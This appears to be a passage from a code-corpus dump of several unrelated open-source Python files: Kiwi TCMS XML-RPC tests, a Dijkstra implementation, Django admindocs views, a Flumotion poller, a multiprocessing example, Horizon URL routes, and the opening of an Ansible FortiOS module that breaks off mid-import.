plans_ids = [plan.pk for plan in self.plans]
components_ids = [self.component1.pk, self.component2.pk]
XmlrpcTestPlan.add_component(self.http_req, plans_ids, components_ids)
for plan in TestPlan.objects.filter(pk__in=plans_ids):
components_ids = [item.pk for item in plan.component.iterator()]
self.assertTrue(self.component1.pk in components_ids)
self.assertTrue(self.component2.pk in components_ids)
class TestPlanTypeMethods(XmlrpcAPIBaseTest):
@classmethod
def setUpTestData(cls):
cls.http_req = make_http_request()
cls.plan_type = f.TestPlanTypeFactory(name="xmlrpc plan type", description="")
def test_check_plan_type(self):
self.assertXmlrpcFaultBadRequest(XmlrpcTestPlan.check_plan_type, self.http_req)
result = XmlrpcTestPlan.check_plan_type(self.http_req, self.plan_type.name)
self.assertEqual(self.plan_type.name, result["name"])
self.assertEqual(self.plan_type.description, result["description"])
self.assertEqual(self.plan_type.pk, result["id"])
def test_get_plan_type(self):
result = XmlrpcTestPlan.get_plan_type(self.http_req, self.plan_type.pk)
self.assertEqual(self.plan_type.name, result["name"])
self.assertEqual(self.plan_type.description, result["description"])
self.assertEqual(self.plan_type.pk, result["id"])
self.assertXmlrpcFaultNotFound(XmlrpcTestPlan.get_plan_type, self.http_req, 0)
self.assertXmlrpcFaultNotFound(XmlrpcTestPlan.get_plan_type, self.http_req, -2)
class TestGetProduct(XmlrpcAPIBaseTest):
@classmethod
def setUpTestData(cls):
cls.http_req = make_http_request()
cls.user = f.UserFactory()
cls.product = f.ProductFactory()
cls.plan = f.TestPlanFactory(author=cls.user, owner=cls.user, product=cls.product)
def _verify_serialize_result(self, result):
self.assertEqual(self.plan.product.name, result["name"])
self.assertEqual(self.plan.product.description, result["description"])
self.assertEqual(self.plan.product.disallow_new, result["disallow_new"])
self.assertEqual(self.plan.product.vote_super_user, result["vote_super_user"])
self.assertEqual(self.plan.product.max_vote_super_bug, result["max_vote_super_bug"])
self.assertEqual(self.plan.product.votes_to_confirm, result["votes_to_confirm"])
self.assertEqual(self.plan.product.default_milestone, result["default_milestone"])
self.assertEqual(self.plan.product.classification.pk, result["classification_id"])
self.assertEqual(self.plan.product.classification.name, result["classification"])
def test_get_product(self):
# self.assertXmlrpcFaultNotFound(
# XmlrpcTestPlan.get_product, self.http_req, 0)
result = XmlrpcTestPlan.get_product(self.http_req, str(self.plan.pk))
self._verify_serialize_result(result)
result = XmlrpcTestPlan.get_product(self.http_req, self.plan.pk)
self._verify_serialize_result(result)
self.assertXmlrpcFaultBadRequest(XmlrpcTestPlan.get_product, self.http_req, "plan_id")
@unittest.skip("TODO: test case is not implemented yet.")
class TestComponentMethods(test.TestCase):
"""TODO:"""
@unittest.skip("TODO: test case is not implemented yet.")
class TestGetAllCasesTags(test.TestCase):
"""TODO:"""
class TestGetTestCases(XmlrpcAPIBaseTest):
"""Test testplan.get_test_cases method"""
@classmethod
def setUpTestData(cls):
cls.http_req = make_http_request()
cls.tester = f.UserFactory(username="tester")
cls.reviewer = f.UserFactory(username="reviewer")
cls.product = f.ProductFactory()
cls.plan = f.TestPlanFactory(author=cls.tester, owner=cls.tester, product=cls.product)
cls.cases = [
f.TestCaseFactory(
author=cls.tester,
default_tester=None,
reviewer=cls.reviewer,
plan=[cls.plan],
),
f.TestCaseFactory(
author=cls.tester,
default_tester=None,
reviewer=cls.reviewer,
plan=[cls.plan],
),
f.TestCaseFactory(
author=cls.tester,
default_tester=None,
reviewer=cls.reviewer,
plan=[cls.plan],
),
]
cls.another_plan = f.TestPlanFactory(
author=cls.tester, owner=cls.tester, product=cls.product
)
def test_get_test_cases(self):
serialized_cases = XmlrpcTestPlan.get_test_cases(self.http_req, self.plan.pk)
for case in serialized_cases:
expected_case = TestCase.objects.filter(plan=self.plan.pk).get(pk=case["case_id"])
self.assertEqual(expected_case.summary, case["summary"])
self.assertEqual(expected_case.priority_id, case["priority_id"])
self.assertEqual(expected_case.author_id, case["author_id"])
plan_case_rel = TestCasePlan.objects.get(plan=self.plan, case=case["case_id"])
self.assertEqual(plan_case_rel.sortkey, case["sortkey"])
@unittest.skip("TODO: fix get_test_cases to make this test pass.")
def test_different_argument_type(self):
self.assertXmlrpcFaultBadRequest(
XmlrpcTestPlan.get_test_cases, self.http_req, str(self.plan.pk)
)
def test_404_when_plan_nonexistent(self):
self.assertXmlrpcFaultNotFound(XmlrpcTestPlan.get_test_cases, self.http_req, 0)
plan_id = TestPlan.objects.order_by("-pk")[:1][0].pk + 1
self.assertXmlrpcFaultNotFound(XmlrpcTestPlan.get_test_cases, self.http_req, plan_id)
def test_plan_has_no_cases(self):
result = XmlrpcTestPlan.get_test_cases(self.http_req, self.another_plan.pk)
self.assertEqual([], result)
@unittest.skip("TODO: test case is not implemented yet.")
class TestGetTestRuns(test.TestCase):
"""TODO:"""
@unittest.skip("TODO: test case is not implemented yet.")
class TestGetText(test.TestCase):
"""TODO:"""
@unittest.skip("TODO: test case is not implemented yet.")
class TestRemoveTag(test.TestCase):
"""TODO:"""
class TestUpdate(test.TestCase):
"""Tests the XMLRPM testplan.update method"""
@classmethod
def setUpTestData(cls):
cls.user = f.UserFactory()
cls.http_req = make_http_request(user=cls.user, user_perm="testplans.change_testplan")
cls.env_group_1 = f.TCMSEnvGroupFactory()
cls.env_group_2 = f.TCMSEnvGroupFactory()
cls.product = f.ProductFactory()
cls.version = f.VersionFactory(product=cls.product)
cls.tester = f.UserFactory()
cls.plan_type = f.TestPlanTypeFactory(name="manual smoking")
cls.plan_1 = f.TestPlanFactory(
product_version=cls.version,
product=cls.product,
author=cls.tester,
type=cls.plan_type,
env_group=(cls.env_group_1,),
)
cls.plan_2 = f.TestPlanFactory(
product_version=cls.version,
product=cls.product,
author=cls.tester,
type=cls.plan_type,
env_group=(cls.env_group_1,),
)
def test_update_env_group(self):
# plan_1 and plan_2 point to self.env_group_1
# and there are only 2 objects in the many-to-many table
# so we issue XMLRPC request to modify the env_group of self.plan_2
plans = XmlrpcTestPlan.update(
self.http_req, self.plan_2.pk, {"env_group": self.env_group_2.pk}
)
plan = plans[0]
# now verify that the returned TP (plan_2) has been updated to env_group_2
self.assertEqual(self.plan_2.pk, plan["plan_id"])
self.assertEqual(1, len(plan["env_group"]))
self.assertEqual(self.env_group_2.pk, plan["env_group"][0])
# and that plan_1 has not changed at all
self.assertEqual(1, self.plan_1.env_group.count())
self.assertEqual(self.env_group_1.pk, self.plan_1.env_group.all()[0].pk)
# and there are still only 2 objects in the many-to-many table
# iow no dangling objects left
self.assertEqual(
2,
TCMSEnvPlanMap.objects.filter(plan__in=[self.plan_1, self.plan_2]).count(),
)
class TestImportCaseViaXML(XmlrpcAPIBaseTest):
"""Test import_case_via_XML"""
@classmethod
def setUpTestData(cls):
cls.author = f.UserFactory(username="user", email="user@example.com")
cls.plan = f.TestPlanFactory(author=cls.author, owner=cls.author)
cls.http_req = make_http_request(user=cls.author)
def test_succeed_to_import_cases(self):
result = import_case_via_XML(self.http_req, self.plan.pk, xml_file_without_error)
self.assertEqual(2, TestCase.objects.count())
self.assertTrue(TestCase.objects.filter(summary="case 2").exists())
self.assertEqual("Success update 2 cases", result)
class TestGet(test.TestCase):
"""Test TestPlan.get"""
@classmethod
def setUpTestData(cls):
cls.author = f.UserFactory(username="user", email="user@example.com")
cls.http_req = make_http_request(user=cls.author)
cls.product = f.ProductFactory()
cls.version = f.VersionFactory(product=cls.product)
cls.type = f.TestPlanTypeFactory(name="temp")
cls.tag_fedora = f.TestTagFactory(name="fedora")
cls.tag_centos = f.TestTagFactory(name="centos")
cls.plan = f.TestPlanFactory(
is_active=True,
extra_link=None,
product=cls.product,
product_version=cls.version,
owner=cls.author,
author=cls.author,
parent=None,
type=cls.type,
tag=[cls.tag_fedora, cls.tag_centos],
)
def test_get(self):
self.maxDiff = None
expected_plan = {
"plan_id": self.plan.pk,
"name": self.plan.name,
"create_date": datetime_to_str(self.plan.create_date),
"is_active": True,
"extra_link": None,
"product_version_id": self.version.pk,
"product_version": self.version.value,
"default_product_version": self.version.value,
"owner_id": self.author.pk,
"owner": self.author.username,
"author_id": self.author.pk,
"author": self.author.username,
"product_id": self.product.pk,
"product": self.product.name,
"type_id": self.type.pk,
"type": self.type.name,
"parent_id": None,
"parent": None,
"attachments": [],
"component": [],
"env_group": [],
"tag": ["centos", "fedora"],
}
plan = XmlrpcTestPlan.get(self.http_req, self.plan.pk)
plan["tag"].sort()
self.assertEqual(expected_plan, plan)
class TestCreatePlan(XmlrpcAPIBaseTest):
"""Test API create"""
@classmethod
def setUpTestData(cls):
cls.author = f.UserFactory(username="user", email="user@example.com")
cls.http_req = make_http_request(user=cls.author, user_perm="testplans.add_testplan")
cls.product = f.ProductFactory()
cls.version = f.VersionFactory(product=cls.product)
cls.type = TestPlanType.objects.first()
def test_create_a_plan(self):
plan_doc = "<h1>Main Plan</h1>"
plan = XmlrpcTestPlan.create(
self.http_req,
{
"name": "Test xmlrpc plan create API",
"product": self.product.pk,
"product_version": self.version.pk,
"type": self.type.pk,
"text": plan_doc,
},
)
created_plan = TestPlan.objects.first()
self.assertIsNotNone(created_plan.email_settings)
self.assertEqual(created_plan.pk, plan["plan_id"])
self.assertEqual(created_plan.product.pk, plan["product_id"])
self.assertEqual(created_plan.product_version.pk, plan["product_version_id"])
self.assertEqual(created_plan.type.pk, plan["type_id"])
self.assertEqual(created_plan.text.first().plan_text, plan_doc)
def test_missing_product(self):
self.assertXmlrpcFaultBadRequest(
XmlrpcTestPlan.create,
self.http_req,
{
"name": "Test xmlrpc plan create API",
"product_version": self.version.pk,
"type": self.type.pk,
"text": "plan text",
},
)
| gpl-2.0 |
alok760/Algorithms_Example | Dijkstra's/Python/Dijakstra.py | 9 | 3333 | def Dijkstra(G, start, end=None):
"""
Find shortest paths from the start vertex to all vertices nearer
than or equal to the end.
The input graph G is assumed to have the following representation: A
vertex can be any object that can be used as an index into a
dictionary. G is a dictionary, indexed by vertices. For any vertex
v, G[v] is itself a dictionary, indexed by the neighbors of v. For
any edge v->w, G[v][w] is the length of the edge. This is related to
the representation in <http://www.python.org/doc/essays/graphs.html>
where Guido van Rossum suggests representing graphs as dictionaries
mapping vertices to lists of outgoing edges, however dictionaries of
edges have many advantages over lists: they can store extra
information (here, the lengths), they support fast existence tests,
and they allow easy modification of the graph structure by edge
insertion and removal. Such modifications are not needed here but
are important in many other graph algorithms. Since dictionaries
obey iterator protocol, a graph represented as described here could
be handed without modification to an algorithm expecting Guido's
graph representation.
Of course, G and G[v] need not be actual Python dict objects, they
can be any other type of object that obeys dict protocol, for
instance one could use a wrapper in which vertices are URLs of web
pages and a call to G[v] loads the web page and finds its outgoing
links.
The output is a pair (D,P) where D[v] is the distance from start to
v and P[v] is the predecessor of v along the shortest path from s to
v.
Dijkstra's algorithm is only guaranteed to work correctly when all
edge lengths are positive. This code does not verify this property
for all edges (only the edges examined until the end vertex is
reached), but will correctly compute shortest paths even for some
graphs with negative edges, and will raise an exception if it
discovers that a negative edge has caused it to make a mistake.
"""
D = {} # dictionary of final distances
P = {} # dictionary of predecessors
Q = priorityDictionary() # estimated distances of non-final vertices
Q[start] = 0
for v in Q:
D[v] = Q[v]
if v == end:
break
for w in G[v]:
vwLength = D[v] + G[v][w]
if w in D:
if vwLength < D[w]:
raise ValueError("Dijkstra: found better path to already-final vertex")
elif w not in Q or vwLength < Q[w]:
Q[w] = vwLength
P[w] = v
return (D, P)
def shortestPath(G, start, end):
"""
Find a single shortest path from the given start vertex to the given
end vertex. The input has the same conventions as Dijkstra(). The
output is a list of the vertices in order along the shortest path.
"""
D, P = Dijkstra(G, start, end)
Path = []
while 1:
Path.append(end)
if end == start:
break
end = P[end]
Path.reverse()
return Path
# example, CLR p.528
G = {'s': {'u':10, 'x':5},
'u': {'v':1, 'x':2},
'v': {'y':4},
'x':{'u':3,'v':9,'y':2},
'y':{'s':7,'v':6}}
print(Dijkstra(G,'s'))
print(shortestPath(G,'s','v'))
| apache-2.0 |
aparo/django-nonrel | django/contrib/admindocs/views.py | 14 | 15302 | from django import template, templatetags
from django.template import RequestContext
from django.conf import settings
from django.contrib.admin.views.decorators import staff_member_required
from django.db import models
from django.shortcuts import render_to_response
from django.core.exceptions import ImproperlyConfigured, ViewDoesNotExist
from django.http import Http404
from django.core import urlresolvers
from django.contrib.admindocs import utils
from django.contrib.sites.models import Site
from django.utils.importlib import import_module
from django.utils.translation import ugettext as _
from django.utils.safestring import mark_safe
import inspect, os, re
# Exclude methods starting with these strings from documentation
MODEL_METHODS_EXCLUDE = ('_', 'add_', 'delete', 'save', 'set_')
class GenericSite(object):
domain = 'example.com'
name = 'my site'
def get_root_path():
try:
return urlresolvers.reverse('admin:index')
except urlresolvers.NoReverseMatch:
from django.contrib import admin
try:
return urlresolvers.reverse(admin.site.root, args=[''])
except urlresolvers.NoReverseMatch:
return getattr(settings, "ADMIN_SITE_ROOT_URL", "/admin/")
def doc_index(request):
if not utils.docutils_is_available:
return missing_docutils_page(request)
return render_to_response('admin_doc/index.html', {
'root_path': get_root_path(),
}, context_instance=RequestContext(request))
doc_index = staff_member_required(doc_index)
def bookmarklets(request):
admin_root = get_root_path()
return render_to_response('admin_doc/bookmarklets.html', {
'root_path': admin_root,
'admin_url': mark_safe("%s://%s%s" % (request.is_secure() and 'https' or 'http', request.get_host(), admin_root)),
}, context_instance=RequestContext(request))
bookmarklets = staff_member_required(bookmarklets)
def template_tag_index(request):
if not utils.docutils_is_available:
return missing_docutils_page(request)
load_all_installed_template_libraries()
tags = []
for module_name, library in template.libraries.items():
for tag_name, tag_func in library.tags.items():
title, body, metadata = utils.parse_docstring(tag_func.__doc__)
if title:
title = utils.parse_rst(title, 'tag', _('tag:') + tag_name)
if body:
body = utils.parse_rst(body, 'tag', _('tag:') + tag_name)
for key in metadata:
metadata[key] = utils.parse_rst(metadata[key], 'tag', _('tag:') + tag_name)
if library in template.builtins:
tag_library = None
else:
tag_library = module_name.split('.')[-1]
tags.append({
'name': tag_name,
'title': title,
'body': body,
'meta': metadata,
'library': tag_library,
})
return render_to_response('admin_doc/template_tag_index.html', {
'root_path': get_root_path(),
'tags': tags
}, context_instance=RequestContext(request))
template_tag_index = staff_member_required(template_tag_index)
def template_filter_index(request):
if not utils.docutils_is_available:
return missing_docutils_page(request)
load_all_installed_template_libraries()
filters = []
for module_name, library in template.libraries.items():
for filter_name, filter_func in library.filters.items():
title, body, metadata = utils.parse_docstring(filter_func.__doc__)
if title:
title = utils.parse_rst(title, 'filter', _('filter:') + filter_name)
if body:
body = utils.parse_rst(body, 'filter', _('filter:') + filter_name)
for key in metadata:
metadata[key] = utils.parse_rst(metadata[key], 'filter', _('filter:') + filter_name)
if library in template.builtins:
tag_library = None
else:
tag_library = module_name.split('.')[-1]
filters.append({
'name': filter_name,
'title': title,
'body': body,
'meta': metadata,
'library': tag_library,
})
return render_to_response('admin_doc/template_filter_index.html', {
'root_path': get_root_path(),
'filters': filters
}, context_instance=RequestContext(request))
template_filter_index = staff_member_required(template_filter_index)
def view_index(request):
if not utils.docutils_is_available:
return missing_docutils_page(request)
if settings.ADMIN_FOR:
settings_modules = [import_module(m) for m in settings.ADMIN_FOR]
else:
settings_modules = [settings]
views = []
for settings_mod in settings_modules:
urlconf = import_module(settings_mod.ROOT_URLCONF)
view_functions = extract_views_from_urlpatterns(urlconf.urlpatterns)
if Site._meta.installed:
site_obj = Site.objects.get(pk=settings_mod.SITE_ID)
else:
site_obj = GenericSite()
for (func, regex) in view_functions:
views.append({
'name': getattr(func, '__name__', func.__class__.__name__),
'module': func.__module__,
'site_id': settings_mod.SITE_ID,
'site': site_obj,
'url': simplify_regex(regex),
})
return render_to_response('admin_doc/view_index.html', {
'root_path': get_root_path(),
'views': views
}, context_instance=RequestContext(request))
view_index = staff_member_required(view_index)
def view_detail(request, view):
if not utils.docutils_is_available:
return missing_docutils_page(request)
mod, func = urlresolvers.get_mod_func(view)
try:
view_func = getattr(import_module(mod), func)
except (ImportError, AttributeError):
raise Http404
title, body, metadata = utils.parse_docstring(view_func.__doc__)
if title:
title = utils.parse_rst(title, 'view', _('view:') + view)
if body:
body = utils.parse_rst(body, 'view', _('view:') + view)
for key in metadata:
metadata[key] = utils.parse_rst(metadata[key], 'model', _('view:') + view)
return render_to_response('admin_doc/view_detail.html', {
'root_path': get_root_path(),
'name': view,
'summary': title,
'body': body,
'meta': metadata,
}, context_instance=RequestContext(request))
view_detail = staff_member_required(view_detail)
def model_index(request):
if not utils.docutils_is_available:
return missing_docutils_page(request)
m_list = [m._meta for m in models.get_models()]
return render_to_response('admin_doc/model_index.html', {
'root_path': get_root_path(),
'models': m_list
}, context_instance=RequestContext(request))
model_index = staff_member_required(model_index)
def model_detail(request, app_label, model_name):
if not utils.docutils_is_available:
return missing_docutils_page(request)
# Get the model class.
try:
app_mod = models.get_app(app_label)
except ImproperlyConfigured:
raise Http404(_("App %r not found") % app_label)
model = None
for m in models.get_models(app_mod):
if m._meta.object_name.lower() == model_name:
model = m
break
if model is None:
raise Http404(_("Model %(model_name)r not found in app %(app_label)r") % {'model_name': model_name, 'app_label': app_label})
opts = model._meta
# Gather fields/field descriptions.
fields = []
for field in opts.fields:
# ForeignKey is a special case since the field will actually be a
# descriptor that returns the other object
if isinstance(field, models.ForeignKey):
data_type = related_object_name = field.rel.to.__name__
app_label = field.rel.to._meta.app_label
verbose = utils.parse_rst((_("the related `%(app_label)s.%(data_type)s` object") % {'app_label': app_label, 'data_type': data_type}), 'model', _('model:') + data_type)
else:
data_type = get_readable_field_data_type(field)
verbose = field.verbose_name
fields.append({
'name': field.name,
'data_type': data_type,
'verbose': verbose,
'help_text': field.help_text,
})
# Gather many-to-many fields.
for field in opts.many_to_many:
data_type = related_object_name = field.rel.to.__name__
app_label = field.rel.to._meta.app_label
verbose = _("related `%(app_label)s.%(object_name)s` objects") % {'app_label': app_label, 'object_name': data_type}
fields.append({
'name': "%s.all" % field.name,
"data_type": 'List',
'verbose': utils.parse_rst(_("all %s") % verbose , 'model', _('model:') + opts.module_name),
})
fields.append({
'name' : "%s.count" % field.name,
'data_type' : 'Integer',
'verbose' : utils.parse_rst(_("number of %s") % verbose , 'model', _('model:') + opts.module_name),
})
# Gather model methods.
for func_name, func in model.__dict__.items():
if (inspect.isfunction(func) and len(inspect.getargspec(func)[0]) == 1):
try:
for exclude in MODEL_METHODS_EXCLUDE:
if func_name.startswith(exclude):
raise StopIteration
except StopIteration:
continue
verbose = func.__doc__
if verbose:
verbose = utils.parse_rst(utils.trim_docstring(verbose), 'model', _('model:') + opts.module_name)
fields.append({
'name': func_name,
'data_type': get_return_data_type(func_name),
'verbose': verbose,
})
# Gather related objects
for rel in opts.get_all_related_objects() + opts.get_all_related_many_to_many_objects():
verbose = _("related `%(app_label)s.%(object_name)s` objects") % {'app_label': rel.opts.app_label, 'object_name': rel.opts.object_name}
accessor = rel.get_accessor_name()
fields.append({
'name' : "%s.all" % accessor,
'data_type' : 'List',
'verbose' : utils.parse_rst(_("all %s") % verbose , 'model', _('model:') + opts.module_name),
})
fields.append({
'name' : "%s.count" % accessor,
'data_type' : 'Integer',
'verbose' : utils.parse_rst(_("number of %s") % verbose , 'model', _('model:') + opts.module_name),
})
return render_to_response('admin_doc/model_detail.html', {
'root_path': get_root_path(),
'name': '%s.%s' % (opts.app_label, opts.object_name),
'summary': _("Fields on %s objects") % opts.object_name,
'description': model.__doc__,
'fields': fields,
}, context_instance=RequestContext(request))
model_detail = staff_member_required(model_detail)
def template_detail(request, template):
templates = []
for site_settings_module in settings.ADMIN_FOR:
settings_mod = import_module(site_settings_module)
if Site._meta.installed:
site_obj = Site.objects.get(pk=settings_mod.SITE_ID)
else:
site_obj = GenericSite()
for dir in settings_mod.TEMPLATE_DIRS:
template_file = os.path.join(dir, template)
templates.append({
'file': template_file,
'exists': os.path.exists(template_file),
'contents': lambda: os.path.exists(template_file) and open(template_file).read() or '',
'site_id': settings_mod.SITE_ID,
'site': site_obj,
'order': list(settings_mod.TEMPLATE_DIRS).index(dir),
})
return render_to_response('admin_doc/template_detail.html', {
'root_path': get_root_path(),
'name': template,
'templates': templates,
}, context_instance=RequestContext(request))
template_detail = staff_member_required(template_detail)
####################
# Helper functions #
####################
def missing_docutils_page(request):
"""Display an error message for people without docutils"""
return render_to_response('admin_doc/missing_docutils.html')
def load_all_installed_template_libraries():
# Load/register all template tag libraries from installed apps.
for module_name in template.get_templatetags_modules():
mod = import_module(module_name)
libraries = [
os.path.splitext(p)[0]
for p in os.listdir(os.path.dirname(mod.__file__))
if p.endswith('.py') and p[0].isalpha()
]
for library_name in libraries:
try:
lib = template.get_library(library_name)
except template.InvalidTemplateLibrary, e:
pass
def get_return_data_type(func_name):
"""Return a somewhat-helpful data type given a function name"""
if func_name.startswith('get_'):
if func_name.endswith('_list'):
return 'List'
elif func_name.endswith('_count'):
return 'Integer'
return ''
def get_readable_field_data_type(field):
"""Returns the description for a given field type, if it exists,
Fields' descriptions can contain format strings, which will be interpolated
against the values of field.__dict__ before being output."""
return field.description % field.__dict__
def extract_views_from_urlpatterns(urlpatterns, base=''):
"""
Return a list of views from a list of urlpatterns.
Each object in the returned list is a two-tuple: (view_func, regex)
"""
views = []
for p in urlpatterns:
if hasattr(p, '_get_callback'):
try:
views.append((p._get_callback(), base + p.regex.pattern))
except ViewDoesNotExist:
continue
elif hasattr(p, '_get_url_patterns'):
try:
patterns = p.url_patterns
except ImportError:
continue
views.extend(extract_views_from_urlpatterns(patterns, base + p.regex.pattern))
else:
raise TypeError(_("%s does not appear to be a urlpattern object") % p)
return views
named_group_matcher = re.compile(r'\(\?P(<\w+>).+?\)')
non_named_group_matcher = re.compile(r'\(.*?\)')
def simplify_regex(pattern):
"""
Clean up urlpattern regexes into something somewhat readable by Mere Humans:
turns something like "^(?P<sport_slug>\w+)/athletes/(?P<athlete_slug>\w+)/$"
into "<sport_slug>/athletes/<athlete_slug>/"
"""
# handle named groups first
pattern = named_group_matcher.sub(lambda m: m.group(1), pattern)
# handle non-named groups
pattern = non_named_group_matcher.sub("<var>", pattern)
# clean up any outstanding regex-y characters.
pattern = pattern.replace('^', '').replace('$', '').replace('?', '').replace('//', '/').replace('\\', '')
if not pattern.startswith('/'):
pattern = '/' + pattern
return pattern
| bsd-3-clause |
flyapen/UgFlu | flumotion/common/poller.py | 2 | 4013 | # -*- Mode: Python; test-case-name: flumotion.test.test_common -*-
# vi:si:et:sw=4:sts=4:ts=4
#
# Flumotion - a streaming media server
# Copyright (C) 2004,2005,2006,2007,2008 Fluendo, S.L. (www.fluendo.com).
# All rights reserved.
# This file may be distributed and/or modified under the terms of
# the GNU General Public License version 2 as published by
# the Free Software Foundation.
# This file is distributed without any warranty; without even the implied
# warranty of merchantability or fitness for a particular purpose.
# See "LICENSE.GPL" in the source distribution for more information.
# Licensees having purchased or holding a valid Flumotion Advanced
# Streaming Server license may use this file in accordance with the
# Flumotion Advanced Streaming Server Commercial License Agreement.
# See "LICENSE.Flumotion" in the source distribution for more information.
# Headers in this file shall remain intact.
"""cancellable, periodic call to a procedure
"""
from twisted.internet import reactor
from twisted.internet.defer import maybeDeferred
from flumotion.common import log
__version__ = "$Rev: 7162 $"
class Poller(object, log.Loggable):
"""A class representing a cancellable, periodic call to a procedure,
which is robust in the face of exceptions raised by the procedure.
The poller will wait for a specified number of seconds between
calls. The time taken for the procedure to complete is not counted
in the timeout. If the procedure returns a deferred, rescheduling
will be performed after the deferred fires.
For example, if the timeout is 10 seconds and the procedure returns
a deferred which fires 5 seconds later, the next invocation of the
procedure will be performed 15 seconds after the previous
invocation.
"""
def __init__(self, proc, timeout, immediately=False, start=True):
"""
@param proc: a procedure of no arguments
@param timeout: float number of seconds to wait between calls
@param immediately: whether to immediately call proc, or to wait
until one period has passed
@param start: whether to start the poller (defaults to True)
"""
self.proc = proc
self.logName = 'poller-%s' % proc.__name__
self.timeout = timeout
self._dc = None
self.running = False
if start:
self.start(immediately)
def start(self, immediately=False):
"""Start the poller.
This procedure is called during __init__, so it is normally not
necessary to call it. It will ensure that the poller is running,
even after a previous call to stop().
@param immediately: whether to immediately invoke the poller, or
to wait until one period has passed
"""
if self.running:
self.debug('already running')
else:
self.running = True
self._reschedule(immediately)
def _reschedule(self, immediately=False):
assert self._dc is None
if self.running:
if immediately:
self.run()
else:
self._dc = reactor.callLater(self.timeout, self.run)
else:
self.debug('shutting down, not rescheduling')
def run(self):
"""Run the poller immediately, regardless of when it was last
run.
"""
def reschedule(v):
self._reschedule()
return v
if self._dc and self._dc.active():
# we don't get here in the normal periodic case, only for
# explicit run() invocations
self._dc.cancel()
self._dc = None
d = maybeDeferred(self.proc)
d.addBoth(reschedule)
def stop(self):
"""Stop the poller.
This procedure ensures that the poller is stopped. It may be
called multiple times.
"""
if self._dc:
self._dc.cancel()
self._dc = None
self.running = False
| gpl-2.0 |
baixuexue123/note | python/concurrency/process_threads.py | 1 | 2227 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import threading
import multiprocessing
import datetime
import time
class WriteFileWorker(multiprocessing.Process):
def __init__(self, queue, name=None):
super(WriteFileWorker, self).__init__(name=name)
self.daemon = 1
self._queue = queue
def run(self):
print('WriteFileWorker start ...')
while 1:
content = self._queue.get()
if content == 'cmd:quit':
break
print(self.name + ' : ' + str(content))
time.sleep(0.1)
def join(self, timeout=None):
self._queue.put('cmd:quit')
super(WriteFileWorker, self).join(timeout=timeout)
class MappingWorker(multiprocessing.Process):
def __init__(self, in_q, out_q, size=4, name=None):
super(MappingWorker, self).__init__(name=name)
self.daemon = 1
self.in_q = in_q
self.out_q = out_q
self.size = size
self._finished = multiprocessing.Event()
def run(self):
print('MappingWorker start ...')
threads = []
for _ in xrange(self.size):
t = threading.Thread(target=self._executor)
t.start()
threads.append(t)
while not self._finished.is_set():
time.sleep(1.0)
for _ in xrange(self.size):
self.in_q.put('cmd:quit')
for t in threads:
t.join()
def _executor(self, ):
while 1:
param = self.in_q.get()
if param == 'cmd:quit':
break
param['datetime'] = datetime.datetime.now()
time.sleep(0.1)
self.out_q.put(param)
def join(self, timeout=None):
self._finished.set()
super(MappingWorker, self).join()
if __name__ == '__main__':
in_queue = multiprocessing.Queue(maxsize=200)
out_queue = multiprocessing.Queue(maxsize=200)
out_worker = WriteFileWorker(out_queue)
out_worker.start()
map_worker = MappingWorker(in_queue, out_queue, size=4)
map_worker.start()
for i in xrange(1000):
in_queue.put({'index': i})
map_worker.join()
out_worker.join()
| bsd-2-clause |
Mirantis/mos-horizon | horizon/site_urls.py | 7 | 1659 | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf import settings
from django.conf.urls import include
from django.conf.urls import url
from django.views.generic import TemplateView # noqa
from django.views import i18n
from horizon.test.jasmine import jasmine
from horizon import views
urlpatterns = [
url(r'^home/$', views.user_home, name='user_home')
]
# Client-side i18n URLconf.
urlpatterns.extend([
url(r'^i18n/js/(?P<packages>\S+?)/$',
i18n.javascript_catalog,
name='jsi18n'),
url(r'^i18n/setlang/$',
i18n.set_language,
name="set_language"),
url(r'^i18n/', include('django.conf.urls.i18n'))
])
if settings.DEBUG:
urlpatterns.extend([
url(r'^jasmine-legacy/$',
TemplateView.as_view(
template_name="horizon/jasmine/jasmine_legacy.html"),
name='jasmine_tests'),
url(r'^jasmine/.*?$', jasmine.dispatcher),
])
| apache-2.0 |
jmehnle/ansible | lib/ansible/modules/network/fortios/fortios_config.py | 50 | 5677 | #!/usr/bin/python
#
# Ansible module to manage configuration on fortios devices
# (c) 2016, Benjamin Jolivot <bjolivot@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: fortios_config
version_added: "2.3"
author: "Benjamin Jolivot (@bjolivot)"
short_description: Manage config on Fortinet FortiOS firewall devices
description:
- This module provides management of FortiOS Devices configuration.
extends_documentation_fragment: fortios
options:
src:
description:
- The I(src) argument provides a path to the configuration file
to load into the remote device.
filter:
description:
- Only for partial backup, you can restrict by giving expected configuration path (ex. firewall address).
default: ""
notes:
- This module requires pyFG python library
"""
EXAMPLES = """
- name: Backup current config
fortios_config:
host: 192.168.0.254
username: admin
password: password
backup: yes
- name: Backup only address objects
fortios_config:
host: 192.168.0.254
username: admin
password: password
backup: yes
backup_path: /tmp/forti_backup/
filter: "firewall address"
- name: Update configuration from file
fortios_config:
host: 192.168.0.254
username: admin
password: password
src: new_configuration.conf
"""
RETURN = """
running_config:
description: full config string
returned: always
type: string
change_string:
description: The commands really executed by the module
returned: only if config changed
type: string
"""
from ansible.module_utils.fortios import fortios_argument_spec, fortios_required_if
from ansible.module_utils.fortios import backup
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
#check for pyFG lib
try:
from pyFG import FortiOS, FortiConfig
